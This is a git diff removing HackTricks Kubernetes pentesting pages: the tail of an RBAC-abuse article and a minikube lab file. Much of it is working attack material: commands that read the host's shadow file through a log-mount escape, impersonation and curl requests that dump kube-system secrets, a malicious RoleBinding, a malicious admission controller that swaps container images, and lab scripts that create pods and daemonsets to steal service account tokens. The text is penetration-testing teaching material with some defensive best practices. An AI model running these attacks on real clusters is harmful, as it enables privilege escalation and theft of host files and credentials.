Then, you will be able to exfiltrate hosts shadow file doing: - -```bash -kubectl logs escaper -failed to get parse function: unsupported log format: "root::::::::\n" -kubectl logs escaper --tail=2 -failed to get parse function: unsupported log format: "systemd-resolve:*:::::::\n" -# Keep incrementing tail to exfiltrate the whole file -``` - -* If the attacker controls any principal with the **permissions to read `nodes/log`**, he can just create a **symlink** in `/host-mounted/var/log/sym` to `/` and when **accessing `https://:10250/logs/sym/` he will lists the hosts root** filesystem (changing the symlink can provide access to files). - -```bash -curl -k -H 'Authorization: Bearer eyJhbGciOiJSUzI1NiIsImtpZCI6Im[...]' 'https://172.17.0.1:10250/logs/sym/' -bin -data/ -dev/ -etc/ -home/ -init -lib -[...] -``` - -**A laboratory and automated exploit can be found in** [**https://blog.aquasec.com/kubernetes-security-pod-escape-log-mounts**](https://blog.aquasec.com/kubernetes-security-pod-escape-log-mounts) - -#### Bypassing readOnly protection - -If you are lucky enough and the highly privileged capability capability `CAP_SYS_ADMIN` is available, you can just remount the folder as rw: - -```bash -mount -o rw,remount /hostlogs/ -``` - -#### Bypassing hostPath readOnly protection - -As stated in [**this research**](https://jackleadford.github.io/containers/2020/03/06/pvpost.html) it’s possible to bypass the protection: - -```yaml -allowedHostPaths: - - pathPrefix: "/foo" - readOnly: true -``` - -Which was meant to prevent escapes like the previous ones by, instead of using a a hostPath mount, use a PersistentVolume and a PersistentVolumeClaim to mount a hosts folder in the container with writable access: - -```yaml -apiVersion: v1 -kind: PersistentVolume -metadata: - name: task-pv-volume-vol - labels: - type: local -spec: - storageClassName: manual - capacity: - storage: 10Gi - accessModes: - - ReadWriteOnce - hostPath: - path: "/var/log" ---- -apiVersion: v1 -kind: 
PersistentVolumeClaim -metadata: - name: task-pv-claim-vol -spec: - storageClassName: manual - accessModes: - - ReadWriteOnce - resources: - requests: - storage: 3Gi ---- -apiVersion: v1 -kind: Pod -metadata: - name: task-pv-pod -spec: - volumes: - - name: task-pv-storage-vol - persistentVolumeClaim: - claimName: task-pv-claim-vol - containers: - - name: task-pv-container - image: ubuntu:latest - command: [ "sh", "-c", "sleep 1h" ] - volumeMounts: - - mountPath: "/hostlogs" - name: task-pv-storage-vol -``` - -### **Impersonating privileged accounts** - -With a [**user impersonation**](https://kubernetes.io/docs/reference/access-authn-authz/authentication/#user-impersonation) privilege, an attacker could impersonate a privileged account. - -In this example, the service account _**sa-imper**_ has a binding to a ClusterRole with rules that allow it to impersonate groups and users. - -![](https://www.cyberark.com/wp-content/uploads/2018/12/clusterRole\_for\_user\_impersonation.png) - -![](https://www.cyberark.com/wp-content/uploads/2018/12/clusterRole\_for\_user\_impersonation\_2.png) - -It's possible to **list all secrets** with `--as=null --as-group=system:master` attributes: - -![](https://www.cyberark.com/wp-content/uploads/2018/12/listing\_secrets\_with\_and\_without\_user\_impersonation-1024x108.png) - -**It's also possible to perform the same action via the API REST endpoint:** - -```bash -curl -k -v -XGET -H "Authorization: Bearer " \ --H "Impersonate-Group: system:masters"\ --H "Impersonate-User: null" \ --H "Accept: application/json" \ -https://:/api/v1/namespaces/kube-system/secrets/ -``` - -### **Listing Secrets** - -The **listing secrets privilege** is a strong capability to have in the cluster. A user with the permission to list secrets can **potentially view all the secrets in the cluster – including the admin keys**. The secret key is a JWT token encoded in base64. 
- -![](https://www.cyberark.com/wp-content/uploads/2018/12/listing\_secrets\_role.png) - -An attacker that gains **access to \_list secrets**\_ in the cluster can use the following _curl_ commands to get all secrets in β€œkube-system” namespace: - -```bash -curl -v -H "Authorization: Bearer " https://:/api/v1/namespaces/kube-system/secrets/ -``` - -![](https://www.cyberark.com/wp-content/uploads/2019/08/Kube-Pentest-Fig-2.png) - -### **Reading a secret – brute-forcing token IDs** - -An attacker that found a token with permission to read a secret can’t use this permission without knowing the full secret’s name. This permission is different from the _**listing** **secrets**_ permission described above. - -![](https://www.cyberark.com/wp-content/uploads/2018/12/getting\_secret\_clusterRole.png) - -![](https://www.cyberark.com/wp-content/uploads/2018/12/clusterRoleBinding\_with\_get\_secrets\_clusterRole.png) - -Although the attacker doesn’t know the secret’s name, there are default service accounts that can be enlisted. - -![](https://www.cyberark.com/wp-content/uploads/2018/12/default\_service\_accounts\_list.png) - -Each service account has an associated secret with a static (non-changing) prefix and a postfix of a random five-character string token at the end. - -![](https://www.cyberark.com/wp-content/uploads/2018/12/default\_service\_account\_on\_kube\_system\_namespace-1024x556.png) - -The random token structure is 5-character string built from alphanumeric (lower letters and digits) characters. 
**But it doesn’t contain all the letters and digits.** - -When looking inside the [source code](https://github.com/kubernetes/kubernetes/blob/8418cccaf6a7307479f1dfeafb0d2823c1c37802/staging/src/k8s.io/apimachinery/pkg/util/rand/rand.go#L83), it appears that the token is generated from only 27 characters β€œbcdfghjklmnpqrstvwxz2456789” and not 36 (a-z and 0-9) - -![](https://www.cyberark.com/wp-content/uploads/2018/12/character\_set\_from\_rand\_go.png) - -![](https://www.cyberark.com/wp-content/uploads/2018/12/comments\_on\_removing\_characters\_rand\_go\_character\_set-1024x138.png) - -This means that there are 275 = 14,348,907 possibilities for a token. - -An attacker can run a brute-force attack to guess the token ID in couple of hours. Succeeding to get secrets from default sensitive service accounts will allow him to escalate privileges. - -## Built-in Privileged Escalation Prevention - -Although there can be risky permissions, Kubernetes is doing good work preventing other types of permissions with potential for privileged escalation. - -Kubernetes has a [built-in mechanism](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#privilege-escalation-prevention-and-bootstrapping) for that: - -β€œThe RBAC API **prevents users from escalating privileges** by editing roles or role bindings. Because this is enforced at the API level, it applies even when the RBAC authorizer is not in use. - -A user can only **create/update a role if they already have all the permissions contained in the role**, at the same scope as the role (cluster-wide for a ClusterRole, within the same namespace or cluster-wide for a Role)” - -Let’s see an example for such prevention. - -A service account named _sa7_ is in a RoleBinding _edit-role-rolebinding_. This RoleBinding object has a role named _edit-role_ that has **full permissions rules** on roles. Theoretically, it means that the service account can **edit** **any role** in the _default_ namespace. 
- -![](https://www.cyberark.com/wp-content/uploads/2018/12/edit\_roles\_roleBinding\_binding\_sa7\_to\_edit\_role.png) - -![](https://www.cyberark.com/wp-content/uploads/2018/12/role\_to\_edit\_any\_role.png) - -There is also an existing role named _list-pods_. Anyone with this role can list all the pods on the _default_ namespace. The user _sa7_ should have permissions to edit any roles, so let’s see what happens when it tries to add the β€œsecrets” resource to the role’s resources. - -![](https://www.cyberark.com/wp-content/uploads/2018/12/edit\_role\_resources-300x66.png) - -After trying to do so, we will receive an error β€œforbidden: attempt to grant extra privileges” (Figure 31), because although our _sa7_ user has permissions to update roles for any resource, it can update the role only for resources that it has permissions over. - -![](https://www.cyberark.com/wp-content/uploads/2018/12/forbidden\_attempt\_to\_gran\_extra\_privileges\_message-1024x288.png) - -### **Get & Patch RoleBindings/ClusterRoleBindings** - -{% hint style="danger" %} -**Apparently this technique worked before, but according to my tests it's not working anymore for the same reason explained in the previous section. Yo cannot create/modify a rolebinding to give yourself or a different SA some privileges if you don't have already.** -{% endhint %} - -The privilege to create Rolebindings allows a user to **bind roles to a service account**. This privilege can potentially lead to privilege escalation because it **allows the user to bind admin privileges to a compromised service account.** - -The following ClusterRole is using the special verb _bind_ that allows a user to create a RoleBinding with _admin_ ClusterRole (default high privileged role) and to add any user, including itself, to this admin ClusterRole. 
- -![](https://www.cyberark.com/wp-content/uploads/2018/12/clusterRole\_with\_bind\_verb.png) - -Then it's possible to create **`malicious-RoleBinging.json`**, which **binds the admin role to other compromised service account:** - -```javascript -{ - "apiVersion": "rbac.authorization.k8s.io/v1", - "kind": "RoleBinding", - "metadata": { - "name": "malicious-rolebinding", - "namespaces": "default" - }, - "roleRef": { - "apiGroup": "*", - "kind": "ClusterRole", - "name": "admin" - }, - "subjects": [ - { - "kind": "ServiceAccount", - "name": "compromised-svc" - "namespace": "default" - } - ] -} -``` - -The purpose of this JSON file is to bind the admin β€œCluserRole” (line 11) to the compromised service account (line 16). - -Now, all we need to do is to send our JSON as a POST request to the API using the following CURL command: - -```bash -curl -k -v -X POST -H "Authorization: Bearer " \ --H "Content-Type: application/json" \ -https://:/apis/rbac.authorization.k8s.io/v1/namespaces/default/rolebindings \ - -d @malicious-RoleBinging.json -``` - -After the **admin role is bound to the β€œcompromised-svc” service account**, we can use the compromised service account token to **list secrets**. The following CURL command will do this: - -```bash -curl -k -v -X POST -H "Authorization: Bearer "\ --H "Content-Type: application/json" -https://:/api/v1/namespaces/kube-system/secret -``` - -## Other Attacks - -### S**idecar proxy app** - -By default there isn't any encryption in the communication between pods .Mutual authentication, two-way, pod to pod. 
- -#### Create a sidecar proxy app - -Create your .yaml - -```bash -kubectl run app --image=bash --command -oyaml --dry-run=client > -- sh -c 'ping google.com' -``` - -Edit your .yaml and add the uncomment lines: - -```yaml -#apiVersion: v1 -#kind: Pod -#metadata: -# name: security-context-demo -#spec: -# securityContext: -# runAsUser: 1000 -# runAsGroup: 3000 -# fsGroup: 2000 -# volumes: -# - name: sec-ctx-vol -# emptyDir: {} -# containers: -# - name: sec-ctx-demo -# image: busybox - command: [ "sh", "-c", "apt update && apt install iptables -y && iptables -L && sleep 1h" ] - securityContext: - capabilities: - add: ["NET_ADMIN"] - # volumeMounts: - # - name: sec-ctx-vol - # mountPath: /data/demo - # securityContext: - # allowPrivilegeEscalation: true -``` - -See the logs of the proxy: - -```bash -kubectl logs app -C proxy -``` - -More info at: [https://kubernetes.io/docs/tasks/configure-pod-container/security-context/](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/) - -### Malicious Admission Controller - -An admission controller is a piece of code that **intercepts requests to the Kubernetes API server** before the persistence of the object, but **after the request is authenticated** **and authorized**. - -![](<../../../.gitbook/assets/image (651) (1) (1) (1) (1) (1).png>) - -If an attacker somehow manages to **inject a Mutationg Adminssion Controller**, he will be able to **modify already authenticated requests**. Being able to potentially privesc, and more usually persist in the cluster. - -Example from [https://blog.rewanthtammana.com/creating-malicious-admission-controllers](https://blog.rewanthtammana.com/creating-malicious-admission-controllers): - -```bash -git clone https://github.com/rewanthtammana/malicious-admission-controller-webhook-demo -cd malicious-admission-controller-webhook-demo -./deploy.sh -kubectl get po -n webhook-demo -w -``` - -Wait until the webhook server is ready. 
Check the status: - -```bash -kubectl get mutatingwebhookconfigurations -kubectl get deploy,svc -n webhook-demo -``` - -![mutating-webhook-status-check.PNG](https://cdn.hashnode.com/res/hashnode/image/upload/v1628433436353/yHUvUWugR.png?auto=compress,format\&format=webp) - -Once we have our malicious mutating webhook running, let's deploy a new pod. - -```bash -kubectl run nginx --image nginx -kubectl get po -w -``` - -Wait again, until you see the change in pod status. Now, you can see `ErrImagePull` error. Check the image name with either of the queries. - -```bash -kubectl get po nginx -o=jsonpath='{.spec.containers[].image}{"\n"}' -kubectl describe po nginx | grep "Image: " -``` - -![malicious-admission-controller.PNG](https://cdn.hashnode.com/res/hashnode/image/upload/v1628433512073/leFXtgSzm.png?auto=compress,format\&format=webp) - -As you can see in the above image, we tried running image `nginx` but the final executed image is `rewanthtammana/malicious-image`. What just happened!!? - -#### Technicalities - -We will unfold what just happened. The `./deploy.sh` script that you executed, created a mutating webhook admission controller. The below lines in the mutating webhook admission controller are responsible for the above results. - -``` -patches = append(patches, patchOperation{ - Op: "replace", - Path: "/spec/containers/0/image", - Value: "rewanthtammana/malicious-image", -}) -``` - -The above snippet replaces the first container image in every pod with `rewanthtammana/malicious-image`. - -## Best Practices - -### **Prevent service account token automounting on pods** - -When a pod is being created, it automatically mounts a service account (the default is default service account in the same namespace). Not every pod needs the ability to utilize the API from within itself. - -From version 1.6+ it is possible to prevent automounting of service account tokens on pods using automountServiceAccountToken: false. It can be used on service accounts or pods. 
- -On a service account it should be added like this:\\ - -![](https://www.cyberark.com/wp-content/uploads/2018/12/serviceAccount\_with\_autoamountServiceAccountToken\_false.png) - -It is also possible to use it on the pod:\\ - -![](https://www.cyberark.com/wp-content/uploads/2018/12/pod\_with\_autoamountServiceAccountToken\_false.png) - -### **Grant specific users to RoleBindings\ClusterRoleBindings** - -When creating RoleBindings\ClusterRoleBindings, make sure that only the users that need the role in the binding are inside. It is easy to forget users that are not relevant anymore inside such groups. - -### **Use Roles and RoleBindings instead of ClusterRoles and ClusterRoleBindings** - -When using ClusterRoles and ClusterRoleBindings, it applies on the whole cluster. A user in such a group has its permissions over all the namespaces, which is sometimes unnecessary. Roles and RoleBindings can be applied on a specific namespace and provide another layer of security. - -### **Use automated tools** - -{% embed url="https://github.com/cyberark/KubiScan" %} - -{% embed url="https://github.com/aquasecurity/kube-hunter" %} - -{% embed url="https://github.com/aquasecurity/kube-bench" %} - -## **References** - -{% embed url="https://www.cyberark.com/resources/threat-research-blog/securing-kubernetes-clusters-by-eliminating-risky-permissions" %} - -{% embed url="https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-1" %} - -*** - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
diff --git a/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/k8s-roles-abuse-lab.md b/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/k8s-roles-abuse-lab.md deleted file mode 100644 index 49138fef1..000000000 --- a/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/k8s-roles-abuse-lab.md +++ /dev/null @@ -1,645 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -You can run these labs just inside **minikube**. - -# Pod Creation -> Escalate to ns SAs - -We are going to create: - -* A **Service account "test-sa"** with a cluster privilege to **read secrets** - * A ClusterRole "test-cr" and a ClusterRoleBinding "test-crb" will be created -* **Permissions** to list and **create** pods to a user called "**Test**" will be given - * A Role "test-r" and RoleBinding "test-rb" will be created -* Then we will **confirm** that the SA can list secrets and that the user Test can list a pods -* Finally we will **impersonate the user Test** to **create a pod** that includes the **SA test-sa** and **steal** the service account **token.** - * This is the way yo show the user could escalate privileges this way - -{% hint style="info" %} -To create the scenario an admin account is used.\ -Moreover, to **exfiltrate the sa token** in this example the **admin account is used** to exec inside the created pod. However, [**as explained here**](./#pod-creation-steal-token), the **declaration of the pod could contain the exfiltration of the token**, so the "exec" privilege is not necesario to exfiltrate the token, the **"create" permission is enough**. 
-{% endhint %} - -```bash -# Create Service Account test-sa -# Create role and rolebinding to give list and create permissions over pods in default namespace to user Test -# Create clusterrole and clusterrolebinding to give the SA test-sa access to secrets everywhere - -echo 'apiVersion: v1 -kind: ServiceAccount -metadata: - name: test-sa ---- -kind: Role -apiVersion: rbac.authorization.k8s.io/v1 -metadata: - name: test-r -rules: - - apiGroups: [""] - resources: ["pods"] - verbs: ["get", "list", "delete", "patch", "create"] ---- -apiVersion: rbac.authorization.k8s.io/v1 -kind: RoleBinding -metadata: - name: test-rb -subjects: - - kind: ServiceAccount - name: test-sa - - kind: User - name: Test -roleRef: - kind: Role - name: test-r - apiGroup: rbac.authorization.k8s.io ---- -kind: ClusterRole -apiVersion: rbac.authorization.k8s.io/v1 -metadata: - name: test-cr -rules: - - apiGroups: [""] - resources: ["secrets"] - verbs: ["get", "list", "delete", "patch", "create"] ---- -apiVersion: rbac.authorization.k8s.io/v1 -kind: ClusterRoleBinding -metadata: - name: test-crb -subjects: - - kind: ServiceAccount - namespace: default - name: test-sa - apiGroup: "" -roleRef: - kind: ClusterRole - name: test-cr - apiGroup: rbac.authorization.k8s.io' | kubectl apply -f - - -# Check test-sa can access kube-system secrets -kubectl --as system:serviceaccount:default:test-sa -n kube-system get secrets - -# Check user User can get pods in namespace default -kubectl --as Test -n default get pods - -# Create a pod as user Test with the SA test-sa (privesc step) -echo "apiVersion: v1 -kind: Pod -metadata: - name: test-pod - namespace: default -spec: - containers: - - name: alpine - image: alpine - command: ['/bin/sh'] - args: ['-c', 'sleep 100000'] - serviceAccountName: test-sa - automountServiceAccountToken: true - hostNetwork: true"| kubectl --as Test apply -f - - -# Connect to the pod created an confirm the attached SA token belongs to test-sa -kubectl exec -ti -n default test-pod -- cat 
/var/run/secrets/kubernetes.io/serviceaccount/token | cut -d "." -f2 | base64 -d - -# Clean the scenario -kubectl delete pod test-pod -kubectl delete clusterrolebinding test-crb -kubectl delete clusterrole test-cr -kubectl delete rolebinding test-rb -kubectl delete role test-r -kubectl delete serviceaccount test-sa -``` - -# Create Daemonset - -```bash -# Create Service Account test-sa -# Create role and rolebinding to give list & create permissions over daemonsets in default namespace to user Test -# Create clusterrole and clusterrolebinding to give the SA test-sa access to secrets everywhere - -echo 'apiVersion: v1 -kind: ServiceAccount -metadata: - name: test-sa ---- -kind: Role -apiVersion: rbac.authorization.k8s.io/v1 -metadata: - name: test-r -rules: - - apiGroups: ["apps"] - resources: ["daemonsets"] - verbs: ["get", "list", "create"] ---- -apiVersion: rbac.authorization.k8s.io/v1 -kind: RoleBinding -metadata: - name: test-rb -subjects: - - kind: User - name: Test -roleRef: - kind: Role - name: test-r - apiGroup: rbac.authorization.k8s.io ---- -kind: ClusterRole -apiVersion: rbac.authorization.k8s.io/v1 -metadata: - name: test-cr -rules: - - apiGroups: [""] - resources: ["secrets"] - verbs: ["get", "list", "delete", "patch", "create"] ---- -apiVersion: rbac.authorization.k8s.io/v1 -kind: ClusterRoleBinding -metadata: - name: test-crb -subjects: - - kind: ServiceAccount - namespace: default - name: test-sa - apiGroup: "" -roleRef: - kind: ClusterRole - name: test-cr - apiGroup: rbac.authorization.k8s.io' | kubectl apply -f - - -# Check test-sa can access kube-system secrets -kubectl --as system:serviceaccount:default:test-sa -n kube-system get secrets - -# Check user User can get pods in namespace default -kubectl --as Test -n default get daemonsets - -# Create a daemonset as user Test with the SA test-sa (privesc step) -echo "apiVersion: apps/v1 -kind: DaemonSet -metadata: - name: alpine - namespace: default -spec: - selector: - matchLabels: - name: alpine - 
template: - metadata: - labels: - name: alpine - spec: - serviceAccountName: test-sa - automountServiceAccountToken: true - hostNetwork: true - containers: - - name: alpine - image: alpine - command: ['/bin/sh'] - args: ['-c', 'sleep 100000']"| kubectl --as Test apply -f - - -# Connect to the pod created an confirm the attached SA token belongs to test-sa -kubectl exec -ti -n default daemonset.apps/alpine -- cat /var/run/secrets/kubernetes.io/serviceaccount/token | cut -d "." -f2 | base64 -d - -# Clean the scenario -kubectl delete daemonset alpine -kubectl delete clusterrolebinding test-crb -kubectl delete clusterrole test-cr -kubectl delete rolebinding test-rb -kubectl delete role test-r -kubectl delete serviceaccount test-sa -``` - -## Patch Daemonset - -In this case we are going to **patch a daemonset** to make its pod load our desired service account. - -If your user has the **verb update instead of patch, this won't work**. - -```bash -# Create Service Account test-sa -# Create role and rolebinding to give list & update patch permissions over daemonsets in default namespace to user Test -# Create clusterrole and clusterrolebinding to give the SA test-sa access to secrets everywhere - -echo 'apiVersion: v1 -kind: ServiceAccount -metadata: - name: test-sa ---- -kind: Role -apiVersion: rbac.authorization.k8s.io/v1 -metadata: - name: test-r -rules: - - apiGroups: ["apps"] - resources: ["daemonsets"] - verbs: ["get", "list", "patch"] ---- -apiVersion: rbac.authorization.k8s.io/v1 -kind: RoleBinding -metadata: - name: test-rb -subjects: - - kind: User - name: Test -roleRef: - kind: Role - name: test-r - apiGroup: rbac.authorization.k8s.io ---- -kind: ClusterRole -apiVersion: rbac.authorization.k8s.io/v1 -metadata: - name: test-cr -rules: - - apiGroups: [""] - resources: ["secrets"] - verbs: ["get", "list", "delete", "patch", "create"] ---- -apiVersion: rbac.authorization.k8s.io/v1 -kind: ClusterRoleBinding -metadata: - name: test-crb -subjects: - - kind: 
ServiceAccount - namespace: default - name: test-sa - apiGroup: "" -roleRef: - kind: ClusterRole - name: test-cr - apiGroup: rbac.authorization.k8s.io ---- -apiVersion: apps/v1 -kind: DaemonSet -metadata: - name: alpine - namespace: default -spec: - selector: - matchLabels: - name: alpine - template: - metadata: - labels: - name: alpine - spec: - automountServiceAccountToken: false - hostNetwork: true - containers: - - name: alpine - image: alpine - command: ['/bin/sh'] - args: ['-c', 'sleep 100']' | kubectl apply -f - - -# Check user User can get pods in namespace default -kubectl --as Test -n default get daemonsets - -# Create a daemonset as user Test with the SA test-sa (privesc step) -echo "apiVersion: apps/v1 -kind: DaemonSet -metadata: - name: alpine - namespace: default -spec: - selector: - matchLabels: - name: alpine - template: - metadata: - labels: - name: alpine - spec: - serviceAccountName: test-sa - automountServiceAccountToken: true - hostNetwork: true - containers: - - name: alpine - image: alpine - command: ['/bin/sh'] - args: ['-c', 'sleep 100000']"| kubectl --as Test apply -f - - -# Connect to the pod created an confirm the attached SA token belongs to test-sa -kubectl exec -ti -n default daemonset.apps/alpine -- cat /var/run/secrets/kubernetes.io/serviceaccount/token | cut -d "." 
-f2 | base64 -d - -# Clean the scenario -kubectl delete daemonset alpine -kubectl delete clusterrolebinding test-crb -kubectl delete clusterrole test-cr -kubectl delete rolebinding test-rb -kubectl delete role test-r -kubectl delete serviceaccount test-sa -``` - -# Doesn't work - -## Create/Patch Bindings - -**Doesn't work:** - -* **Create a new RoleBinding** just with the verb **create** -* **Create a new RoleBinding** just with the verb **patch** (you need to have the binding permissions) - * You cannot do this to assign the role to yourself or to a different SA -* **Modify a new RoleBinding** just with the verb **patch** (you need to have the binding permissions) - * You cannot do this to assign the role to yourself or to a different SA - -```bash -echo 'apiVersion: v1 -kind: ServiceAccount -metadata: - name: test-sa ---- -apiVersion: v1 -kind: ServiceAccount -metadata: - name: test-sa2 ---- -kind: Role -apiVersion: rbac.authorization.k8s.io/v1 -metadata: - name: test-r -rules: - - apiGroups: ["rbac.authorization.k8s.io"] - resources: ["rolebindings"] - verbs: ["get", "patch"] ---- -apiVersion: rbac.authorization.k8s.io/v1 -kind: RoleBinding -metadata: - name: test-rb -subjects: - - kind: User - name: Test -roleRef: - kind: Role - name: test-r - apiGroup: rbac.authorization.k8s.io ---- -kind: Role -apiVersion: rbac.authorization.k8s.io/v1 -metadata: - name: test-r2 -rules: - - apiGroups: [""] - resources: ["pods"] - verbs: ["get", "list", "delete", "patch", "create"] ---- -apiVersion: rbac.authorization.k8s.io/v1 -kind: RoleBinding -metadata: - name: test-rb2 -subjects: - - kind: ServiceAccount - name: test-sa - apiGroup: "" -roleRef: - kind: Role - name: test-r2 - apiGroup: rbac.authorization.k8s.io' | kubectl apply -f - - -# Create a pod as user Test with the SA test-sa (privesc step) -echo "apiVersion: rbac.authorization.k8s.io/v1 -kind: RoleBinding -metadata: - name: test-r2 -subjects: - - kind: ServiceAccount - name: test-sa2 - apiGroup: "" -roleRef: - 
kind: Role - name: test-r2 - apiGroup: rbac.authorization.k8s.io"| kubectl --as Test apply -f - - -# Connect to the pod created an confirm the attached SA token belongs to test-sa -kubectl exec -ti -n default test-pod -- cat /var/run/secrets/kubernetes.io/serviceaccount/token | cut -d "." -f2 | base64 -d - -# Clean the scenario -kubectl delete rolebinding test-rb -kubectl delete rolebinding test-rb2 -kubectl delete role test-r -kubectl delete role test-r2 -kubectl delete serviceaccount test-sa -kubectl delete serviceaccount test-sa2 -``` - -## Bind explicitly Bindings - -In the "Privilege Escalation Prevention and Bootstrapping" section of [https://unofficial-kubernetes.readthedocs.io/en/latest/admin/authorization/rbac/](https://unofficial-kubernetes.readthedocs.io/en/latest/admin/authorization/rbac/) it's mentioned that if a SA can create a Binding and has explicitly Bind permissions over the Role/Cluster role, it can create bindings even using Roles/ClusterRoles with permissions that it doesn't have.\ -However, it didn't work for me: - -```yaml -# Create 2 SAs, give one of them permissions to create clusterrolebindings -# and bind permissions over the ClusterRole "admin" -echo 'apiVersion: v1 -kind: ServiceAccount -metadata: - name: test-sa ---- -apiVersion: v1 -kind: ServiceAccount -metadata: - name: test-sa2 ---- -kind: ClusterRole -apiVersion: rbac.authorization.k8s.io/v1 -metadata: - name: test-cr -rules: - - apiGroups: ["rbac.authorization.k8s.io"] - resources: ["clusterrolebindings"] - verbs: ["get", "create"] - - apiGroups: ["rbac.authorization.k8s.io/v1"] - resources: ["clusterroles"] - verbs: ["bind"] - resourceNames: ["admin"] ---- -apiVersion: rbac.authorization.k8s.io/v1 -kind: ClusterRoleBinding -metadata: - name: test-crb -subjects: - - kind: ServiceAccount - name: test-sa - namespace: default -roleRef: - kind: ClusterRole - name: test-cr - apiGroup: rbac.authorization.k8s.io -' | kubectl apply -f - - -# Try to bind the ClusterRole "admin" with the 
second SA (won't work) -echo 'apiVersion: rbac.authorization.k8s.io/v1 -kind: ClusterRoleBinding -metadata: - name: test-crb2 -subjects: - - kind: ServiceAccount - name: test-sa2 - namespace: default -roleRef: - kind: ClusterRole - name: admin - apiGroup: rbac.authorization.k8s.io -' | kubectl --as system:serviceaccount:default:test-sa apply -f - - -# Clean environment -kubectl delete clusterrolebindings test-crb -kubectl delete clusterrolebindings test-crb2 -kubectl delete clusterrole test-cr -kubectl delete serviceaccount test-sa -kubectl delete serviceaccount test-sa -``` - -```yaml -# Like the previous example, but in this case we try to use RoleBindings -# instead of CLusterRoleBindings - -echo 'apiVersion: v1 -kind: ServiceAccount -metadata: - name: test-sa ---- -apiVersion: v1 -kind: ServiceAccount -metadata: - name: test-sa2 ---- -kind: ClusterRole -apiVersion: rbac.authorization.k8s.io/v1 -metadata: - name: test-cr -rules: - - apiGroups: ["rbac.authorization.k8s.io"] - resources: ["clusterrolebindings"] - verbs: ["get", "create"] - - apiGroups: ["rbac.authorization.k8s.io"] - resources: ["rolebindings"] - verbs: ["get", "create"] - - apiGroups: ["rbac.authorization.k8s.io/v1"] - resources: ["clusterroles"] - verbs: ["bind"] - resourceNames: ["admin","edit","view"] ---- -apiVersion: rbac.authorization.k8s.io/v1 -kind: RoleBinding -metadata: - name: test-rb - namespace: default -subjects: - - kind: ServiceAccount - name: test-sa - namespace: default -roleRef: - kind: ClusterRole - name: test-cr - apiGroup: rbac.authorization.k8s.io -' | kubectl apply -f - - -# Won't work -echo 'apiVersion: rbac.authorization.k8s.io/v1 -kind: RoleBinding -metadata: - name: test-rb2 - namespace: default -subjects: - - kind: ServiceAccount - name: test-sa2 - namespace: default -roleRef: - kind: ClusterRole - name: admin - apiGroup: rbac.authorization.k8s.io -' | kubectl --as system:serviceaccount:default:test-sa apply -f - - -# Clean environment -kubectl delete rolebindings 
test-rb -kubectl delete rolebindings test-rb2 -kubectl delete clusterrole test-cr -kubectl delete serviceaccount test-sa -kubectl delete serviceaccount test-sa2 -``` - -## Arbitrary roles creation - -In this example we try to create a role having the permissions create and path over the roles resources. However, K8s prevent us from creating a role with more permissions the principal creating is has: - -```yaml -# Create a SA and give the permissions "create" and "patch" over "roles" -echo 'apiVersion: v1 -kind: ServiceAccount -metadata: - name: test-sa ---- -kind: Role -apiVersion: rbac.authorization.k8s.io/v1 -metadata: - name: test-r -rules: - - apiGroups: ["rbac.authorization.k8s.io"] - resources: ["roles"] - verbs: ["patch", "create", "get"] ---- -apiVersion: rbac.authorization.k8s.io/v1 -kind: RoleBinding -metadata: - name: test-rb -subjects: - - kind: ServiceAccount - name: test-sa -roleRef: - kind: Role - name: test-r - apiGroup: rbac.authorization.k8s.io -' | kubectl apply -f - - -# Try to create a role over all the resources with "create" and "patch" -# This won't wotrk -echo 'kind: Role -apiVersion: rbac.authorization.k8s.io/v1 -metadata: - name: test-r2 -rules: - - apiGroups: [""] - resources: ["*"] - verbs: ["patch", "create"]' | kubectl --as system:serviceaccount:default:test-sa apply -f- - -# Clean the environment -kubectl delete rolebinding test-rb -kubectl delete role test-r -kubectl delete role test-r2 -kubectl delete serviceaccount test-sa -``` - - -
